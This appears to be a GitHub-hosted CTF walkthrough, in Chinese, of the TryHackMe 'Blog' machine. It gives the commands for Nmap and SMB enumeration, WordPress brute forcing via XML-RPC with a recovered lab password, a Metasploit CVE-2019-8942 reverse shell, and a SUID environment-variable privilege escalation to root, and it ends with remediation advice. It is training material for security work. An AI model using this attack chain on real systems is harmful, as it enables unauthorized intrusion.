ZeyadAshraf/THM-Blog-Walkthrough

GitHub: ZeyadAshraf/THM-Blog-Walkthrough

针对 TryHackMe 平台 Blog 靶机的完整渗透测试 Writeup，详尽记录了从信息收集到获取 root 权限的端到端攻击链路。

Stars: 0 | Forks: 0

# THM-Blog-Walkthrough ##🛡️ TryHackMe：Blog 机器 Writeup 日期：2026 年 5 月 11 日作者：** [zeyad ashraf elkhradly] 难度：Medium 类别：Web / Linux / 权限提升 ## 📋 概述本报告记录了对 **Blog** 机器进行端到端安全评估和漏洞利用的完整过程。本次评估遵循了标准的渗透测试方法：侦察、枚举、漏洞利用和权限提升。攻击路径包括绕过 SMB 访客限制、暴力破解 WordPress 凭证，以及利用自定义 SUID 二进制文件中的逻辑漏洞，最终获取完整的 root 权限。 ## 🛠️ 阶段 1：侦察与枚举 ## 1.1 网络扫描初始阶段以全面的 **Nmap** 扫描开始，以识别开放端口和服务。 ``` nmap -sV -sC -oN nmap_results.txt 10.114.185.79 Port 80 (HTTP): Hosting a legacy WordPress 5.0 instance. Port 139/445 (SMB): Anonymous login allowed, exposing shared resources. ``` ![Nmap 结果](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/f17db5b093141133.png) ### 1.2 SMB 枚举（表面分析）使用 `smbclient` 和 `enum4linux`，我对 SMB 共享进行了深度扫描。 * **发现：** `BillySMB` 共享允许以访客身份访问。 * **结果：** 在对可用文件和元数据进行彻底的手动检查后，未发现直接的漏洞或敏感凭证。 * **策略决定：** 此路径被记录为直接利用的“死胡同”，促使评估重点转移到 Web 应用层以获取初始访问权限。 ## 🚀 阶段 2：漏洞分析与初始访问 2.1 XML-RPC 发现我确认 xmlrpc.php 已启用并处于活动状态。这是一个关键漏洞，因为它允许通过 system.multicall 进行优化的暴力破解攻击，从而绕过传统的速率限制。 ## 2.2 暴力破解凭证利用 Burp Suite Intruder，我根据枚举出的数据对用户 kwheel 进行了攻击。发现的凭证：kwheel : cutiepie1 证据：观察到成功的 302 重定向响应，确认登录成功。 ![burp suite 过程](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/f7c6dbb69b141139.png) ## 2.3 漏洞利用（远程代码执行）获取 WordPress 后台管理权限后，我利用了 Metasploit 模块 exploit/multi/http/wp_crop_rce (CVE-2019-8942)。此图像处理漏洞使我能够执行反弹 shell。 Bash msf6 > exploit(wp_crop_rce) > set LHOST [Your_IP] msf6 > exploit(wp_crop_rce) > exploit [*] Meterpreter session 1 opened! ![仓库创建过程](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/6576767464141145.png) ## 🛠️ 阶段 3：后渗透与稳定性 ## 3.1 Shell 稳定化为确保拥有完全可用且交互式的工作环境，我使用 Python 的 PTY 模块升级了反弹 shell： Bash python3 -c 'import pty; pty.spawn("/bin/bash")' 漏洞利用成功后，建立了一个 Meterpreter 会话。随后使用 Python 将 shell 升级为完全交互式的 TTY。 ![Shell 访问与稳定化](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/1616f98962141151.png) ### 3.2 面对兔子洞在探索 `/home/bjoel/` 时，发现了一个具有欺骗性的 `user.txt`，促使我继续进行权限维持。 ![Try Harder 消息](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/c1b790ac71141156.png) ## 👑 阶段 4：权限提升（通往 Root 之路） ## 4.1 SUID 二进制文件发现我搜索了可能导致权限提升的配置不当的 SUID 二进制文件。 Bash find / -perm -u=s -type f 2>/dev/null 结果：在 `/usr/sbin/checker` 发现了一个不寻常的自定义二进制文件。 ## 4.2 二进制分析与逻辑漏洞利用使用 strings 实用程序，我对 `/usr/sbin/checker` 二进制文件进行了静态分析。分析显示它调用了 getenv("admin")。漏洞利用：通过操纵环境变量，我成功满足了程序的逻辑并触发了 setuid(0) 调用。 Bash export admin=true /usr/sbin/checker 结果：瞬间切换到 root 用户。 ![ 恭喜 Mr root # ](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/a91e9b9f03141201.png) ## 🎯 结论与修复建议 WordPress 安全：更新到最新版本以修补 CVE-2019-8942，并禁用 XML-RPC。 SMB 加固：禁用对内部共享的匿名/访客访问。二进制权限：定期审核自定义二进制文件的 SUID/SGID 位，并确保它们遵循最小权限原则。

标签：Burp Suite, CISA项目, CTF Writeup, CTI, Linux提权, Nmap, PoC, SMB枚举, SUID提权, TryHackMe, Walkthrough, Web安全, WordPress漏洞, XML-RPC利用, 协议分析, 安全报告, 插件系统, 文件完整性监控, 暴力破解, 权限提升, 漏洞分析, 编程工具, 网络安全, 蓝队分析, 虚拟驱动器, 路径探测, 远程代码执行, 逆向工具, 隐私保护, 靶机渗透